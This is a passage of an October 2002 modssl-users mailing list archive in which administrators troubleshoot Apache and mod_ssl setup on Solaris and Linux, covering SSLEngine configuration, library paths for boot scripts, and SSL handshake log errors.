system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 30 19:16:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA05037; Wed, 30 Oct 2002 19:15:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from socrates.Berkeley.EDU id TAA04975; Wed, 30 Oct 2002 19:14:43 +0100 (MET)
Received: (from rsr@localhost)
	by socrates.Berkeley.EDU (8.11.3/8.11.3) id g9UIEdx29160
	for modssl-users@modssl.org; Wed, 30 Oct 2002 10:14:39 -0800 (PST)
Date: Wed, 30 Oct 2002 10:14:39 -0800 (PST)
From: Roger Rosenblum 
Message-Id: <200210301814.g9UIEdx29160@socrates.Berkeley.EDU>
To: modssl-users@modssl.org
Subject: Invalid method in request \x80\x80\x01\x03\x01
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Roger Rosenblum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Greetings,

I'm having problems getting SSL to work with Apache at the moment.
The message showing up the the error_log is:

	Invalid method in request \x80\x80\x01\x03\x01

and openssl reports "unknown protocol:s23_clnt.c:460:"

Situation:
=============
Sparc Solaris 9, 
Apache 1.3.27 
mod_ssl-2.18.12 for apache 1.3.27
openssl-0.9.6.g
mm-1.1.3
perl 5.8.0
openldap-2.0.25
mod_fastcgi-2.2.12
mod_perl-1.27

All statically compiled with no visible errors from the install.

I created an SSL key and signed a test certificate and installed them in the 

/usr/lcoal/apache/conf/ssl.crt/server.crt 

/usr/local/apache/conf/ssl.key/server.key

But I get errors trying to connect to it either as https:// and 
also with the openssl command itself:

*********************************************************************
../bin/openssl s_client -connect localhost:443 -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 0015E368 [00160508] (130 bytes => 130 (0x82))
0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 00   ......W... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 05   .........f......
0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 00   ................
0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 00   .e..d..c..b..a..
0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 14   `...........@...
0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02   ................
0060 - 00 80 92 22 27 d6 22 a7-d0 f7 1b 6f 47 89 7e 64   ..."'."....oG.~d
0070 - 2a be ef ca 6d 31 8c 83-7c 91 84 a4 29 17 24 f1   *...m1..|...).$.
0080 - 9b 51                                             .Q
SSL_connect:SSLv2/v3 write client hello A
read from 0015E368 [00165A68] (7 bytes => 7 (0x7))
0000 - 3c 21 44 4f 43 54 59                              
	from VL-MS-MR002.sc1.videotron.ca id UAA06337; Wed, 30 Oct 2002 20:09:45 +0100 (MET)
Received: from dopey.geoffnet ([24.202.196.188])
 by VL-MS-MR002.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 0.9 (built Jul 29 2002))
 with ESMTP id <0H4T00HSC6JXUK@VL-MS-MR002.sc1.videotron.ca> for
 modssl-users@modssl.org; Wed, 30 Oct 2002 14:09:33 -0500 (EST)
Date: Wed, 30 Oct 2002 14:09:32 -0500
From: Geoff Thorpe 
Subject: Re: Invalid method in request \x80\x80\x01\x03\x01
In-reply-to: <200210301814.g9UIEdx29160@socrates.Berkeley.EDU>
To: modssl-users@modssl.org
Message-id: <200210301409.32334.geoff@geoffthorpe.net>
MIME-version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
User-Agent: KMail/1.4.3
References: <200210301814.g9UIEdx29160@socrates.Berkeley.EDU>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wednesday 30 Oct 2002 1:14 pm, Roger Rosenblum wrote:
> Greetings,
>
> I'm having problems getting SSL to work with Apache at the moment.

"SSLEngine on"

Your (virtual) host is expecting to talk clear HTTP to the client, and
you need to tell it to talk HTTPS instead. Ie. on the server, you're
seeing it try to interpret the SSL/TLS handshake data from the client as
though it was a clear-text HTTP request, ie;

> The message showing up the the error_log is:
> 	Invalid method in request \x80\x80\x01\x03\x01

and your SSL/TLS client is getting a clear-text ("bad request") response
from the server and trying to interpret it as SSL/TLS handshake data.

> and openssl reports "unknown protocol:s23_clnt.c:460:"
[snip]
> SSL_connect:SSLv2/v3 write client hello A
> read from 0015E368 [00165A68] (7 bytes => 7 (0x7))
> 0000 - 3c 21 44 4f 43 54 59                              
	from visp.engelschall.com id UAA06697; Wed, 30 Oct 2002 20:27:00 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 230A34CE75F; Wed, 30 Oct 2002 20:27:02 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id CCC122878F; Wed, 30 Oct 2002 20:11:48 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailgate5.cinetic.de id TAA05533; Wed, 30 Oct 2002 19:43:34 +0100 (MET)
Received: from web.de (fmomail02.dlan.cinetic.de [172.20.1.46])
	by mailgate5.cinetic.de (8.11.2/8.11.2/SuSE Linux 8.11.0-0.4) with SMTP id g9UIhSX19184;
	Wed, 30 Oct 2002 19:43:28 +0100
Date: Wed, 30 Oct 2002 19:43:28 +0100
Message-Id: <200210301843.g9UIhSX19184@mailgate5.cinetic.de>
MIME-Version: 1.0
Organization: http://freemail.web.de/
From: Oliver Koeller 
To: modssl-users@modssl.org
Subject: apachectl startssl - error
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Oliver Koeller 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

i am a newbie to apache with ssl.
Under Solaris 8 I installed openssl 0.9.6g in /usr/local/openssl
In Apache 2.0.43 i did:
configure --enable-ssl --with-ssl=/usr/local/openssl
--> No errors.

make
--> No errors.

make install
--> No errors.

I generated a .cert and .key file and copied them to /usr/local/openssl/certs and /usr/local/openssl/private.

Then I tried to start it with:
apachectl startssl

and I get the following message:

[Wed Oct 30 19:31:59 2002] [crit] [Wed Oct 30 19:31:59 2002] \
file vhost.c, line 232, assertion "rv == APR_SUCCESS" failed
Abort - core dumped

No error logs were created.

Any ideas??
Please help.
Thank you.
Bye,
Olli.
______________________________________________________________________________
Angst vor Viren? Nicht bei WEB.DE FreeMail. Hier konnen Sie jeden
Dateianhang auf Viren prufen. http://freemail.web.de/?mc=021157
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 30 20:48:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA07335; Wed, 30 Oct 2002 20:47:28 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sj-msg-core-3.cisco.com id UAA07326; Wed, 30 Oct 2002 20:46:55 +0100 (MET)
Received: from princeton.cisco.com (IDENT:mirapoint@princeton.cisco.com [64.101.71.62])
	by sj-msg-core-3.cisco.com (8.12.2/8.12.2) with ESMTP id g9UJkgxF018378
	for ; Wed, 30 Oct 2002 11:46:43 -0800 (PST)
Received: from CSCOAMERA10315 (dhcp-64-101-69-124.cisco.com [64.101.69.124])
	by princeton.cisco.com (Mirapoint)
	with ESMTP id AAM06526;
	Wed, 30 Oct 2002 12:46:45 -0700 (MST)
From: "Lawrence Cole" 
To: 
Subject: RE: Startup Script
Date: Wed, 30 Oct 2002 12:46:45 -0700
Message-ID: <001c01c2804d$142b3bd0$5d446540@amer.cisco.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: <5.1.1.6.0.20021029211149.00a3a7a0@mail.developersdesk.com>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lawrence Cole" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It's the last script to run in the directory.  It's an S99 file.  I'm
running Solaris 8 with the latest "patch cluster" from Sun.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Rick Widmer
Sent: Tuesday, October 29, 2002 9:16 PM
To: modssl-users@modssl.org; modssl-users@modssl.org
Subject: Re: Startup Script


At 08:52 PM 10/29/02 -0700, Lawrence Cole wrote:
>
>ld.so.1: /opt/apache/bin/httpd: fatal: libexpat.so.0: open failed: No 
>such
>file or directory
>Killed
>/opt/apache/bin/apachectl startssl: httpd could not be started
>Once the system is booted up the LD_LIBRARY_PATH is 
>"/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib", and I can run 
>"/opt/apache/bin/apachectl startssl" just fine.  For automation
reasons, I 
>need to boot at startup.  Any suggestions?
>

When in the startup sequence are you starting Apache?  It needs to be
very 
late in the process. The only thing I do AFTER starting apache in myh 
startup scripts is run a process that assigns the ailias IP addresses to

the server.

Without knowing what OS you are using I can't make any suggestions on 
exactly how to fix it, but I'm sure it is a matter of starting Apache
late 
in the process.

Rick


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 30 21:07:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA07846; Wed, 30 Oct 2002 21:06:28 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sj-msg-core-4.cisco.com id VAA07822; Wed, 30 Oct 2002 21:05:14 +0100 (MET)
Received: from princeton.cisco.com (IDENT:mirapoint@princeton.cisco.com [64.101.71.62])
	by sj-msg-core-4.cisco.com (8.12.2/8.12.2) with ESMTP id g9UK57ot029657
	for ; Wed, 30 Oct 2002 12:05:08 -0800 (PST)
Received: from CSCOAMERA10315 (dhcp-64-101-69-124.cisco.com [64.101.69.124])
	by princeton.cisco.com (Mirapoint)
	with ESMTP id AAM06674;
	Wed, 30 Oct 2002 13:05:06 -0700 (MST)
From: "Lawrence Cole" 
To: 
Subject: RE: Startup Script
Date: Wed, 30 Oct 2002 13:05:06 -0700
Message-ID: <001f01c2804f$a4249db0$5d446540@amer.cisco.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: <484A6CA492BE654395D208B1D8D5393973A477@SOMEXEVS001.ex.ordersx.org>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lawrence Cole" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Boyle,

Thank you for your suggestions.

Adding "LD_LIBRARY_PATH=/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib"
to the startup script does not help.

Sourcing root's .profile before running the "apachectl startssl" command
does not help.  The LD_LIBRARY_PATH is set in the .profile.

So the last thing to try are the -R and -L compile-time option pairs for
each library.  I have a rookie question to ask.  Where do I use these?
I can't use them with the .configure or make commands.  Do I need to
edit the Makefile?  Can you give me an example?

Regards,

Lawrence


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Boyle Owen
Sent: Wednesday, October 30, 2002 2:21 AM
To: modssl-users@modssl.org
Subject: RE: Startup Script


Quick fix is to put in the startup script:

LD_LIBRARY_PATH=/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib

before it tries to start apache..

Better fix is to recompile apache with the additional compile-time
options: "-L/usr/openwin/lib -R/usr/openwin/lib" etc. (one pair for each
lib). This should build the paths to the libs into the binary and then
you don't need LD_LIBRARY_PATH at all.

-----Original Message-----
From: Lawrence Cole [mailto:lmcole@cisco.com]
Sent: Mittwoch, 30. Oktober 2002 04:52
To: modssl-users@modssl.org
Subject: Startup Script


Greetings everyone,

I realize this situation has come up before, but none of the suggestions
I have seen have worked for me.

I have created an Apache 1.3.26 / mod_ssl 2.8.10 server.  No problems
creating it, and no problems starting from the command line.  I am
however, unable to start automatically at boot using a script in the
rc3.d directory.  When I try to start it automatically using:

#!/bin/sh
#
# Start SSL-Aware Apache http daemon
#
echo "Start SSL-Aware Apache httpd"
/opt/apache/bin/apachectl startssl


I get the following error:

ld.so.1: /opt/apache/bin/httpd: fatal: libexpat.so.0: open failed: No
such file or directory Killed /opt/apache/bin/apachectl startssl: httpd
could not be started

Once the system is booted up the LD_LIBRARY_PATH is
"/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib", and I can run
"/opt/apache/bin/apachectl startssl" just fine.  For automation reasons,
I need to boot at startup.  Any suggestions?

Regards,

Lawrence

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 30 21:21:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA08566; Wed, 30 Oct 2002 21:20:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id VAA08548; Wed, 30 Oct 2002 21:19:23 +0100 (MET)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id PAA23101;
	Wed, 30 Oct 2002 15:17:48 -0500
Date: Wed, 30 Oct 2002 15:17:48 -0500 (EST)
From: "R. DuFresne" 
To: Lawrence Cole 
cc: modssl-users@modssl.org
Subject: RE: Startup Script
In-Reply-To: <001f01c2804f$a4249db0$5d446540@amer.cisco.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


your problem might be the ldconfig settings, for your system, they might
not be locating the libs prperly for the server to find them and function.
try updating ldso with a call to ldconfig, if thats the proper solaris way
of doing things, with the lib paths required, something like a ldconfig -R
-v (paths) which is the bsdish way.  It's been awhile since I admined a
sun system and my sun box is bsd'ed, so I can't check at present for  the
proper syntax and params for you, but this should give you a clue...

Thanks,

Ron DuFresne


On Wed, 30 Oct 2002, Lawrence Cole wrote:

> Boyle,
> 
> Thank you for your suggestions.
> 
> Adding "LD_LIBRARY_PATH=/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib"
> to the startup script does not help.
> 
> Sourcing root's .profile before running the "apachectl startssl" command
> does not help.  The LD_LIBRARY_PATH is set in the .profile.
> 
> So the last thing to try are the -R and -L compile-time option pairs for
> each library.  I have a rookie question to ask.  Where do I use these?
> I can't use them with the .configure or make commands.  Do I need to
> edit the Makefile?  Can you give me an example?
> 
> Regards,
> 
> Lawrence
> 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Boyle Owen
> Sent: Wednesday, October 30, 2002 2:21 AM
> To: modssl-users@modssl.org
> Subject: RE: Startup Script
> 
> 
> Quick fix is to put in the startup script:
> 
> LD_LIBRARY_PATH=/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib
> 
> before it tries to start apache..
> 
> Better fix is to recompile apache with the additional compile-time
> options: "-L/usr/openwin/lib -R/usr/openwin/lib" etc. (one pair for each
> lib). This should build the paths to the libs into the binary and then
> you don't need LD_LIBRARY_PATH at all.
> 
> -----Original Message-----
> From: Lawrence Cole [mailto:lmcole@cisco.com]
> Sent: Mittwoch, 30. Oktober 2002 04:52
> To: modssl-users@modssl.org
> Subject: Startup Script
> 
> 
> Greetings everyone,
> 
> I realize this situation has come up before, but none of the suggestions
> I have seen have worked for me.
> 
> I have created an Apache 1.3.26 / mod_ssl 2.8.10 server.  No problems
> creating it, and no problems starting from the command line.  I am
> however, unable to start automatically at boot using a script in the
> rc3.d directory.  When I try to start it automatically using:
> 
> #!/bin/sh
> #
> # Start SSL-Aware Apache http daemon
> #
> echo "Start SSL-Aware Apache httpd"
> /opt/apache/bin/apachectl startssl
> 
> 
> I get the following error:
> 
> ld.so.1: /opt/apache/bin/httpd: fatal: libexpat.so.0: open failed: No
> such file or directory Killed /opt/apache/bin/apachectl startssl: httpd
> could not be started
> 
> Once the system is booted up the LD_LIBRARY_PATH is
> "/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib", and I can run
> "/opt/apache/bin/apachectl startssl" just fine.  For automation reasons,
> I need to boot at startup.  Any suggestions?
> 
> Regards,
> 
> Lawrence
> 
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company. 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 31 09:06:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA25088; Thu, 31 Oct 2002 09:05:58 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id JAA24904; Thu, 31 Oct 2002 09:04:35 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id g9V84Vfr015982
	for ; Thu, 31 Oct 2002 09:04:31 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id g9V84REm020964
	for ; Thu, 31 Oct 2002 09:04:31 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Startup Script
Date: Thu, 31 Oct 2002 09:04:27 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393972F6CA@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Startup Script
Importance: normal
Thread-Index: AcKAUB7KyH0BwJHoSuuTkHw2RqE9OQAYSI6w
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

To expand a little on my previous post:

When you run a shell-script, it forks a new shell which doesn't usually
inherit environment variables from the calling shell. So you have to set
any envs in the script. To do this under the standard shell (i.e.
/bin/sh) you need two lines:

	LD_LIBRARY_PATH="/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib"
	export LD_LIBRARY_PATH

Under the tcsh, you'd only need one:

	setenv LD_LIBRARY_PATH
/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib

So that's how to get LD_LIBRARY_PATH to work.

However, the use of LD_LIBRARY_PATH is generally discouraged for several
reasons - it breaks encapsulation by making the execution of a binary
dependent on the shell (hence your problem), it invites namespace
problems if two libraries in different lib directories have the same
name (the binary will load the first it finds on the path), on large
projects with lots of development libs, the path can become unfeasibly
large, etc. etc.

A much cleaner solution is to define the paths when compiling. Thus the
binary carries with it the paths to just those directories it needs. To
do this, define the "CFLAGS" environment variable in the shell in which
you configure apache, i.e.

	CFLAGS="-L/lib -R/lib -L/usr/lib -R/usr/lib -L/usr/openwin/lib
-R/usr/openwin/lib"
	export CFLAGS
	./configure 

When you run make, you will find that the CFLAGS above will appear on
the compile line and the resulting binary will find its libraries from
these internal symbols.

Compiling is a bit of a black art at times and I don't really understand
all of it myself - the advices in this note are just some distillations
of my own experiences and things I found when trawling the web..

Rgds,

Owen Boyle

-----Original Message-----
From: Lawrence Cole [mailto:lmcole@cisco.com]
Sent: Mittwoch, 30. Oktober 2002 21:05
To: modssl-users@modssl.org
Subject: RE: Startup Script


Boyle,

Thank you for your suggestions.

Adding "LD_LIBRARY_PATH=/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib"
to the startup script does not help.

Sourcing root's .profile before running the "apachectl startssl" command
does not help.  The LD_LIBRARY_PATH is set in the .profile.

So the last thing to try are the -R and -L compile-time option pairs for
each library.  I have a rookie question to ask.  Where do I use these?
I can't use them with the .configure or make commands.  Do I need to
edit the Makefile?  Can you give me an example?

Regards,

Lawrence


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Boyle Owen
Sent: Wednesday, October 30, 2002 2:21 AM
To: modssl-users@modssl.org
Subject: RE: Startup Script


Quick fix is to put in the startup script:

LD_LIBRARY_PATH=/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib

before it tries to start apache..

Better fix is to recompile apache with the additional compile-time
options: "-L/usr/openwin/lib -R/usr/openwin/lib" etc. (one pair for each
lib). This should build the paths to the libs into the binary and then
you don't need LD_LIBRARY_PATH at all.

-----Original Message-----
From: Lawrence Cole [mailto:lmcole@cisco.com]
Sent: Mittwoch, 30. Oktober 2002 04:52
To: modssl-users@modssl.org
Subject: Startup Script


Greetings everyone,

I realize this situation has come up before, but none of the suggestions
I have seen have worked for me.

I have created an Apache 1.3.26 / mod_ssl 2.8.10 server.  No problems
creating it, and no problems starting from the command line.  I am
however, unable to start automatically at boot using a script in the
rc3.d directory.  When I try to start it automatically using:

#!/bin/sh
#
# Start SSL-Aware Apache http daemon
#
echo "Start SSL-Aware Apache httpd"
/opt/apache/bin/apachectl startssl


I get the following error:

ld.so.1: /opt/apache/bin/httpd: fatal: libexpat.so.0: open failed: No
such file or directory Killed /opt/apache/bin/apachectl startssl: httpd
could not be started

Once the system is booted up the LD_LIBRARY_PATH is
"/lib:/usr/lib:/usr/local/lib:/usr/openwin/lib", and I can run
"/opt/apache/bin/apachectl startssl" just fine.  For automation reasons,
I need to boot at startup.  Any suggestions?

Regards,

Lawrence

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 31 19:26:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA17697; Thu, 31 Oct 2002 19:25:16 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA17620; Thu, 31 Oct 2002 19:24:44 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DA8D44CE78C; Thu, 31 Oct 2002 19:24:44 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B14142878E; Thu, 31 Oct 2002 19:23:22 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from culver-exch.culver-holdings.com id NAA02464; Thu, 31 Oct 2002 13:25:05 +0100 (MET)
Received: from culver-exch.culver-holdings.com (unverified) by culver-exch.culver-holdings.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Thu, 31 Oct 2002 12:09:46 +0000
Received: by CULVER-EXCH with Internet Mail Service (5.5.2653.19)
	id ; Thu, 31 Oct 2002 12:09:46 -0000
Message-ID: 
From: Rhys Hopkins 
To: "'modssl-users@modssl.org'" 
Subject: SSL handshake interrupted by system [Hint: Stop button pressed in
	 browser?!]
Date: Thu, 31 Oct 2002 12:09:42 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain; charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rhys Hopkins 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I know this has been asked before, and I know I should RTFM, but can anyone
point me at the right configuration directives as to how to avoid getting
the following errors in my apache log file:

------

31 10:54:08 2002] [error] mod_ssl: SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[Thu Oct 31 10:54:08 2002] [error] System: Broken pipe (errno: 32)

-- and --

[Thu Oct 31 10:55:39 2002] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?!] (System error follows)
[Thu Oct 31 10:55:39 2002] [error] System: Connection reset by peer (errno:
104)

------


These occur _extremely_ frequently, and I am pretty sure this is the
"Internet Explorer Bug" where random images, css files etc. fail to load in
IE under https, since we have this problem too. 

I am using Apache 1.3.26, mod_ssl 0.9.6g on Linux 2.2.16-SMP

Any help would be greatly appreciated.

Rhys.



--
Rhys Hopkins
Systems Administration
Culver Technologies Ltd.


***********************************************************************************************************
Visit us at http://www.culver-tec.com

DISCLAIMER & CONFIDENTIALITY NOTICE

This email and any files transmitted with it are confidential and intended solely for the use
of the individual or entity to whom they are addressed.  This communication may contain
privileged material.  If you are not the intended recipient or the person responsible for 
delivering the email to the intended recipient, please be advised that you have received
this email in error and that any use, dissemination, forwarding, printing or copying of this
email is strictly prohibited.

The content of this email and any files transmitted with it may not reflect the views and
opinions of the originating company.  If you have received this email in error, please 
telephone +44 (020) 7456 1300 immediately.
The contents of this email are subject to the terms and conditions of use of our Websites.
No inappropriate content of any sort in this email is approved by us.
